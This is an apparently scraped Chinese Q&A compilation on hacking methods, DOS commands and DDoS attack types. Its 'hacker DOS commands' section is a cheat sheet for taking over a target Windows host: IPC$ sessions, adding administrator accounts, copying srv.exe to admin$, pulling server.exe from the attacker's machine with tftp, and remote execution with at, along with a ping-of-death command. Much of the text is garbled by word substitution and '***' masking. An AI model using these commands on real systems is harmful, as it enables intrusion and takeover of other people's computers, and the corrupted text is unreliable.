本文目录一览:
- 1、黑客攻击主要有哪些手段?
- 2、黑客常有的dos命令
- 3、我要DOS命令的大全
- 4、7种DDOS命令是?
黑客攻击主要有哪些手段?
黑客攻击手段:
1、漏洞扫描器
漏洞扫描器是用来快速检查已知弱点的工具,这就方便黑客利用它们绕开访问计算机的指定端口,即使有防火墙,也能让黑客轻易篡改系统程序或服务,让恶意攻击有机可乘。
2. 逆向工程
逆向工程是很可怕的,黑客可以利用逆向工程,尝试手动查找漏洞,然后对漏洞进行测试,有时会在未提供代码的情况下对软件进行逆向工程。
3. 蛮力攻击
这种手段可以用于密码猜测,速度非常快。但如果面对的是很长的密码,蛮力搜索就需要更长的时间,这时候黑客会使用字典攻击的 *** 。
4. 密码破解
黑客会反复猜测尝试,手工破解常见密码,并反复尝试使用“字典”或带有许多密码的文本文件中的密码,从而可以窃取隐私数据。
5. 数据包嗅探器
数据包嗅探器是捕获的数据分组,可以被用于捕捉密码和其他应用程序的数据,再传输到 *** 上,造成数据泄露。
黑客作用原理
1、收集 *** 系统中的信息
信息的收集并不对目标产生危害,只是为进一步的入侵提供有用信息。黑客可能会利用下列的公开协议或工具,收集驻留在 *** 系统中的各个主机系统的相关信息。
2、探测目标 *** 系统的安全漏洞
在收集到一些准备要攻击目标的信息后,黑客们会探测目标 *** 上的每台主机,来寻求系统内部的安全漏洞。
3、建立模拟环境,进行模拟攻击
根据前面两小点所得的信息,建立一个类似攻击对象的模拟环境,然后对此模拟目标进行一系列的攻击。在此期间,通过检查被攻击方的日志,观察检测工具对攻击的反应,可以进一步了解在攻击过程中留下的“痕迹”及被攻击方的状态,以此来制定一个较为周密的攻击策略。
4、具体实施 *** 攻击
入侵者根据前几步所获得的信息,同时结合自身的水平及经验总结出相应的攻击 *** ,在进行模拟攻击的实践后,将等待时机,以备实施真正的 *** 攻击。
黑客常有的dos命令
黑客常用DOS命令:
net use $"\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接
net use $"\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接
net use h: $"\\ip\c$Content$nbsp;"密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: $"\\ip\c$Content$nbsp;登陆后映射对方C:到本地为H:
net use $"\\ip\ipc$Content$nbsp;/del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统 *** 设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的 *** 连接类型和信息
net share 查看本地开启的共享
net share ipc$Content$nbsp;开启ipc$共享
net share ipc$Content$nbsp;/del 删除ipc$共享
net share c$Content$nbsp;/del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的 *** 连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe $"\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy $\svv.exe"\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示 *** 地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并更大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
print 文件名 打印文本文件
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:
doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\可执行文件的文件名为可执行文件设置一个路径。 cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; regedit /e 注册表文件名 导出注册表 cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地 *** 配置情况 IIS服务命令: iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) iisreset /start或stop 启动(停止)所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 FTP 命令: (后面有详细说明内容) ftp的命令行格式为: ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。 -d 使用调试方式。 -n 限制ftp的自动登录,即不使用.netrc文件。 -g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp会话(与open对应) open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete [remote-files] 删除一批文件
我要DOS命令的大全
cd 改变当前目录 sys *** DOS系统盘
copy 拷贝文件 del 删除文件
deltree 删除目录树 dir 列文件名
diskcopy 制磁盘 edit 文本编辑
format 格式化磁盘 md 建立子目录
mem 查看内存状况 type 显示文件内容
rd 删除目录 ren 改变文件名
记得多少啊,忘了就去上课看看,下面四个命令是新的,给出命令格式,你自己试试看,学电脑重要的就是摸索。
cls 清屏
〔适用场合〕 屏幕上太乱了,或是屏幕上出现乱码了, 清除屏幕上显示内容但不
影响电脑内部任何信息
〔用 法〕 cls 回车
move 移动文件,改目录名
〔适用场合〕 移动文件到别的目录
〔用 法〕 move [文件名] [目录] 移动文件至新目录下
move [目录名] [目录名] 改目录名
〔例 子〕 c:\move c:\autoexec.bat c:\old�
移动autoexec.bat文件至old目录下
c:\move c:\config.sys c:\temp�
移动config.sys文件至old目录下
more 分屏显示
〔适用场合〕 当输出很多一屏显示不下时采用,几乎适合所有命令,尤其是type
等命令时很有用。 使用more时磁盘不能有写保护,也不适合光驱。
〔用 法〕 type [文件名] | more 分屏显示文件内容
more [文件名] 分屏显示文件内容
〔例 子〕 C:\type msdos.w40 | more
xcopy 拷贝目录和文件
〔适用场合〕 在进行连同子目录一起拷贝时很有用,在拷贝大量文件时比COPY命令
要快得多
〔用 法〕 xcopy [文件名] [目录] 将指定文件拷贝到指定目录
xcopy [源目录] [目的目录] 将源目录连子目录考到目的目录下
xcopy *.* [目录] /s 将文件与非空子目录拷贝到指定目录
其它常用参数还有: v 拷贝后校验,会影响速度
e 与s 相似,但即使子目录是空的也会拷贝
help 帮助
〔适用场合〕 当您想具体了解DOS命令的使用 *** 时使用
〔用 法〕 help 提供所有DOS命令帮助
help [DOS命令] 提供有关命令的帮助
attrib 设置文件属性
〔适用场合〕 想对文件做较特殊的处理时
〔用 法〕 attrib 显示所有文件的属性
attrib +r或-r [文件名] 设置文件属性是否为只读
attrib +h或-h [文件名] 设置文件属性是否隐含
attrib +s或-s [文件名] 设置文件属性是否为系统文件
attrib +a或-a [文件名] 设置文件属性是否为归档文件
attrib /s 设置包括子目录的文件在内的文件属性
〔例 子〕 C:\TESTattrib +r wina20.386
C:\attrib +h *.* /s� 隐含所有文件
date 显示及修改日期
〔适用场合〕 想知道或修改时间和日期
〔用 法〕 date 显示和改变当前日期
〔例 子〕 C:\date 09-20-1996� 将日期改为1996年9月20日
C:\date�
Current date is Tue 08-20-1996
Enter new date (mm-dd-yy):09-20-1996
按月-日-年的顺序修改当前日期 直接按回车键忽略修改日期
lable 设置卷标号
〔适用场合〕 用来为磁盘做个标记
〔用 法〕 label 显示磁盘卷标
label [盘符] [卷标名] 设定指定盘的卷标
〔例 子〕 C:\label�
Volume in drive C is WANG
Volume Serial Number is 2116-1DD0
volume label (11 characters,Enter for none)?
可以输入卷标,直接回车后
Delete current volume label (Y/N)?
按y删除旧卷标,按n不更改
defrag 磁盘碎片整理
〔适用场合〕 磁盘读写次数很多,或磁盘使用时间很长了,可能需要使用这条命令
整理磁盘。磁盘碎片并不是指磁盘坏了,而只是由于多次的拷贝和删
除文件后,磁盘使用会很不连贯,致使速度变慢。
doskey 调用和建立DOS宏命令
〔适用场合〕 经常需要输入重复的命令时,有非常大的用处
〔用 法〕 doskey
将doskey驻留内存,开辟出缓冲区,以后输入的命令都将保存在缓冲
区中,可以随时调用
doskey [宏命令名]=[命令名]
将宏命令定义为命令,以后输入宏命令,电脑就会执行相应的命令
doskey /reinstall 重新安装doskey
doskey /bufsize= 设置缓冲区的大小
doskey /macros 显示所有doskey宏
doskey /history 显示内存中所有命令
doskey /insert|overstrike 设置新键入的字符是否覆盖旧的字符
〔例 子〕 C:\DOSKEY�
C:\dir
C:\copy C:\temp\*.* a:
C:\del c:\temp\*.*
C:\copy b:\*.* c:\temp
上述四条命令都已被保存,用光标控制键的上下可以依次选择使用或
修改, 也可以用F7键列出保存的所有命令
C:\doskey di=dir/w/p� 定义di为宏命令,意思是执行dir/w/p
fdisk 硬盘分区
〔建 议〕 只有硬盘被很利害的病毒感染时,或是一块新硬盘才需要分区,更好
请懂行的人指导。硬盘都需经过低级格式化,分区,格式化三个步骤
才可使用,成品电脑内的硬盘都已经做过这些加工了。
〔用 法〕 输入fdisk后按回车即可进入提示界面
emm386 扩展内存管理
〔建 议〕 这条命令比较复杂,在第五章中系统配置里将详细介绍
lh/loadhigh 将程序装入高端内存
〔适用场合〕 这条命令一般用在autoexec.bat中,当有些软件需要的基本内存很大
时,它会有用
〔用 法〕 lh [程序]
将程序装入高端内存 使用此命令时,config.sys文件中需有下面两
条语句。 device=emm386.exe dos=umb
lh [程序] /l:区号 将程序装入指定的umb区
lh /s 一般是由memmaker专用
〔例 子〕 C:\MOUSE\lh mouse� 将鼠标驱动程序装入高端内存
memmaker 内存优化管理
〔适用场合〕 这个命令现在已经很少用了,在当年DOS流行时,想玩游戏可少不了
它,它可以腾出许多基本内存供游戏使用,只需安装一次即可
〔用 法〕 1. C:\memmaker�
2. 回车继续,F3退出
3. 选择手动安装和自动安装,直接回车表示自动安装(回车得了)
4. 选择是否有程序需要扩充内存,可用空格键选择,Yes表示需要,
No不需要,按回车键即可。
5. 程序自动检测硬盘内是否安装了WINDOWS
6. 软驱中若有软盘则应将其取出,然后按回车键,电脑将重新起动
两次,不要中断,只需按回车键。
(其实很简单,一直按回车键就行了,呵呵)
msd 系统检测
〔适用场合〕 用于检查系统信息
undelete 恢复被删除的文件
〔适用场合〕 当不小心删错了文件时,它可以用得上。
DOS删除文件时,只是将文件从分配表中去除,在磁盘存储区内将文
件名的之一个字母删除,文件内容并未马上从磁盘中删除,所以能恢
复。
〔用 法〕 undelete 恢复已删除的文件
undelete /all 恢复文件且不再询问是否恢复,
以"#%-0123456789abcdefghijklmnopqrstuvwxyz"的顺序为之一个
字母来恢复文件
undelete /list 列可恢复的文件名
undelete /s 可将undelete驻留内存,但几乎没人这样使用
prompt 设置提示符
〔适用场合〕 当你厌烦了c:\的提示符或者您想使您的提示符与众不同时,您可以
试一试,非常有趣的DOS命令,可以随时显示时间与日期。
〔用 法〕 prompt $p$g 以当前目录名和号为提示符,这是最常用的提示符
prompt $t 表示时间 prompt $d 表示日期
prompt $$ 表示$ prompt $q 表示=
prompt $v 表示当前版本 prompt $l 表示
prompt $b 表示| prompt $h 表示退位符
prompt $e 表示Esc代表的字符 prompt $_ 表示回车换行
〔例 子〕 C:\DOSprompt wang$g� 将wang作为提示符
WANGprompt $t$d$g� 使用时间、日期和号做为提示符
0:01:07.77Thu 08-29-1996prompt $p$g�
C:\DOS
restore 恢复已备份的文件
〔建 议〕 如果以前用backup做过文件备份,则当原文件损坏时可以用它来恢复
文件。
将用backup命令备份的磁盘中的文件恢复到另一磁盘中,备份磁盘中
应有backup.00X和control.00X这两条文件。
〔用 法〕 restore [备份盘符] [目标盘符]
将备份盘上备份文件恢复到指定盘上
restore /s 将备份文件包括子目录都恢复到指定盘上
restore /p 让用户判断是否恢复文件
restore /b:日期 恢复日期以前的文件
restore /a:日期 恢复日期之后的文件
restore /l:时间 恢复时间之前的文件
restore /e:时间 恢复时间之后的文件
restore /m 只恢复上次备份后修改过的文件
restore /n 只恢复上次备份后已删 除的文件
restore /d 只显示要恢复的文件名
〔例 子〕 C:\DOSrestore a: c:�
Insert backup diskette 01 in drive A:
Press any key to continue . . .
在A驱中放入之一张备份盘,按任意键即可,恢复完之一张后,按顺
序放入其它盘即可。
当您用上述命令不能正确恢复文件时请用:
C:\DOSrestore a: c:\ /s�
time 显示及修改时间
〔适用场合〕 用于显示及修改时间,用法同date
〔例 子〕 C:\DOStime�
Current time is 12:15:26.04a
Enter new time: 11:20:20.00p
按时:分顺序输入时间,再加上下午(a/p)即可 直接按ENTER键可忽略
修改时间。
set 设置环境变量
〔适用场合〕 设置声卡和路径等时用到
〔用 法〕 set [环境变量]=[字符串]
这条命令常常用在autoexec.bat中
〔例 子〕 C:\set blaster=a220 i5 d1 设置声卡的参数
C:\set path=c:\dos path c:\dos含义相同
*** artdrv 设置磁盘加速器
〔建 议〕 它可以提高硬盘访问速度,更好在autoexec.bat文件中加载吧。
〔用 法〕 *** artdrv /x
执行并驻留内存,开辟磁盘加速缓存区,并屏蔽所有驱动器缓存,是
较常用的 *** (一般用这个命令就够了)
*** artdrv /c 将缓存内的信息都写入硬盘
*** artdrv /e: 数字 设置一次移动的信息量
*** artdrv /b: 数字 设置预先读取的缓冲区大小
append 设置非执行文件的路径
〔适用场合〕 当您无法在多个目录中寻找到自己输入的文稿时,可以试一试这个命
令,用法类似path。
〔用 法〕 append [路径];[路径]
〔例 子〕 C:\append c:\test�
设置寻找非可执行文件路径为c:\test如果该目录下有文件1.txt时,
在其它目录下调用1.txt找不到时,可自动寻找到c:\test目录。
D:\UCDOSedit 1.txt 可找到C:\test\1.txt文件
debug 程序调试命令
〔建 议〕 如果你学过汇编语言,那你应该会使用debug,如果没学过,更好别
使用
〔用 法〕 debug [文件名]
diskcomp 比较磁盘
〔适用场合〕 比较两张盘是否相同,没想到什么时候会用到,在比较用diskcopy拷
贝的两张盘,为什么不用diskcopy/v校验呢?
〔用 法〕 diskcomp [盘符1] [盘符2] 比较盘1和盘2
diskcomp /1 只比较磁盘的之一面
diskcomp /8 只比较没磁道的前8个扇区
〔例 子〕 C:\diskcomp a: a:
在同一软驱中比较两张盘
Insert FIRST diskette in drive A:
放入之一张盘
Press any key to continue . . .
Comparing 80 tracks 18 sectors per track, 2 side(s)
Insert SECOND diskette in drive A:
放入第二张盘
Press any key to continue . . . Compare OK
比较未发现不同
Compare another diskette (Y/N) ?n
是否比较其它盘,选y继续比较,选n停止
expand 解压工具
〔适用场合〕 微软公司软件原始安装盘中有许多后缀以"_"结尾的压缩文件,可以
用它解压,解除您因为少数几个文件丢失造成的麻烦。
〔用 法〕 expand [源文件名] [目的文件]
〔例 子〕 C:\expand a:vsafe.co_ c:\dos\vsafe.com
� 解压vsafe.co_为vsafe.com文件
Microsoft (R) File Expansion Utility Version 2.10
Copyright (C) Microsoft Corp 1990-1993. All rights
reserved.
Expanding a:vsafe.co_ to c:\dos\vsafe.com. a:vsafe.co_:
33046 bytes expanded to 62576 bytes, 89% increase.
C:\DOS
fasthelp 快速显示帮助信息
〔建 议〕 可以看看所有的命令,对于单个的命令,还不如在命令名后加/?参数
方便
〔用 法〕 fasthelp 列出所有DOS命令的用处
fasthelp [命令名] 显示命令的用处,等价于 [命令名]/?
fc 文件比较
〔建 议〕 也许对于大多数人是永远不会用到它的
〔用 法〕 fc [文件名1] [文件名2] 比较两文件的不同
参数还有: a c l Lbn n t w nnnn
〔例 子〕 C:\TESTfc a.bat b.bat�
Comparing files A.BAT and B.BAT
***** A.BAT
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag
if errorlevel 2 goto mem
if errotlevel 1 goto end
***** B.BAT choice /c:dme defrag,mem,end
***** C:\TEST
interlnk 启动简易网客户机
〔适用场合〕 如果有两台电脑可以通过它和intersvr联成简易的 *** ,这是条很有
用的命令,但不常用
〔用 法〕 DOS新增支持 *** 的功能,
它可以使两台电脑通过并口线或串口线相联组成简易的 ***
使用interlnk 必须在config.sys中增添一句:
device=c:\dos\interlnk
并口线的两头都应是25针公接头,针之间的连接如下图:对应
p2------------------------p15
p3------------------------p13
p4------------------------p12
p5------------------------p10 公接头指接头为带针的
p6------------------------p11 母接头指接头为带孔的
p15-----------------------p2
p13-----------------------p3
p12-----------------------p4
p10-----------------------p5
p11-----------------------p6
p25-----------------------p25 地线
〔例 子〕 C:\DOS\interlnk Port-LPT1
this Computer Other Computer
(Client) (Server)
----------------------------------------
E: equals A:
F: equals C:
在客户机中E盘即为服务机的A盘,F盘为服务机的C盘
intersvr 启动简易网服务器
〔适用场合〕 使用它,电脑就成了服务器了(只限与DOS提供的简易网)
〔用 法〕 intersvr 启动服务机
intersvr /lpt:1 启动服务机,用lpt1口作为数据传输口
intersvr /com:1 启动服务机,用com1口作为数据传输口
参数还有 x baud: b v rcopy (参见interlnk)
〔例 子〕 C:\DOSintersvr�
qbasic 启动Basic集成环境
〔建 议〕 也许对于大多数人是永远不会用到它的
〔用 法〕 如果会qbasic语言,那么可以利用它编写自己的程序。edit.com必须
有它才可用。
qbasic 起动basic语言环境
qbasic/editor 以全屏方式编辑语言
参数还有: b g h mbf nohi run
〔例 子〕 C:\DOSqbasic�
setver 设置版本
〔适用场合〕 当希望使用其它版本的dos命令时可以用它来欺骗电脑。在高版本
DOS中,某些旧版本程序需要DOS3.3时,可用setver来设置
〔用 法〕 使用时一般在config.sys中加入 device=setver.exe
setver 显示文件的版本
setver [文件名] n.nn 设置指定文件的版本号
〔例 子〕 C:\DOSsetver�
KERNEL.EXE 5.00
DOSOAD.SYS 5.00
EDLIN.EXE 5.00
BACKUP.EXE 5.00
ASSIGN.COM 5.00
EXE2BIN.EXE 5.00
JOIN.EXE 5.00
RECOVER.EXE 5.00
WINWORD.EXE 4.10
C:\
若程序AAA.exe必须在MS-DOS3.3下执行,则键入
C:\DOSsetver aaa.exe 3.30�
又如net5.exe仅在MS-DOS5.0下执行,则在config.sys中加入
device=setver.exe后也可在Ms-DOS6.22下运行。
share 文件共享
〔建 议〕 只有在软件声明必须要运行它时才用
〔用 法〕 可在config.sys中加入 install=share.exe 也可直接运行
参数有 f l
subst 路径替换
〔建 议〕 一个非常有趣的命令,如果经常用光碟软件,可能有用。
〔用 法〕 subst 显示当前的替代路径
subst [盘符] [路径]
将指定的路径替代盘符,该路径将作为驱动器使用
subst /b 解除替代
〔例 子〕 C:\DOSsubst a: c:\temp� 用c盘temp目录替代a盘
C:\subst a: /d� 解除替代
tree 显示命令树结构
〔适用场合〕 查看所有的子目录
〔用 法〕 tree [盘符] 显示所有的子目录树
tree /f 显示目录时同时显示文件名
tree /a 以ASCII码显示目录树
〔例 子〕 C:\WINDOWStree /a�
unformat 恢复已被格式化的磁盘
〔建 议〕 你把有重要信息的软盘格式化了?快用unformat……什么?你用了
format /u,那死定了
〔用 法〕 unformat [盘符] 恢复指定的被格式化的磁盘
unformat /l 显示unformat所找到的文件名
〔例 子〕 C:\WINDOWSunformat a:�
vsafe 病毒防护程序
〔建 议〕 把它装入内存可以随时检测出许多种病毒,是比较有用的。
〔用 法〕 vsafe 加载vsafe在内存中
vsafe /u 从内存中去除vsafe
vsafe/ne 将vsafe装入扩充内存
vsafe/nx 将vsafe装入扩展内存
参数还有 Ax Cx n d
〔例 子〕 C:\vsafe
7种DDOS命令是?
DDOS攻击是现在最常见的一种黑客攻击方式,下面就给大家简单介绍一下DDOS的七种攻击方式。
1.Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。
2.Smurf:该攻击向一个子网的广播地址发一个带有特定请求(如ICMP回应请求)的包,并且将源地址伪装成想要攻击的主机地址。子网上所有主机都回应广播包请求而向被攻击主机发包,使该主机受到攻击。
3.Land-based:攻击者将一个包的源地址和目的地址都设置为目标主机的地址,然后将该包通过IP欺骗的方式发送给被攻击主机,这种包可以造成被攻击主机因试图与自己建立连接而陷入死循环,从而很大程度地降低了系统性能。
4.Ping of Death:根据TCP/IP的规范,一个包的长度更大为65536字节。尽管一个包的长度不能超过65536字节,但是一个包分成的多个片段的叠加却能做到。当一个主机收到了长度大于65536字节的包时,就是受到了Ping of Death攻击,该攻击会造成主机的宕机。
5.Teardrop:IP数据包在 *** 传递时,数据包可以分成更小的片段。攻击者可以通过发送两段(或者更多)数据包来实现TearDrop攻击。之一个包的偏移量为0,长度为N,第二个包的偏移量小于N。为了合并这些数据段,TCP/IP堆栈会分配超乎寻常的巨大资源,从而造成系统资源的缺乏甚至机器的重新启动。
6.PingSweep:使用ICMP Echo轮询多个主机。
7.Pingflood: 该攻击在短时间内向目的主机发送大量ping包,造成 *** 堵塞或主机资源耗尽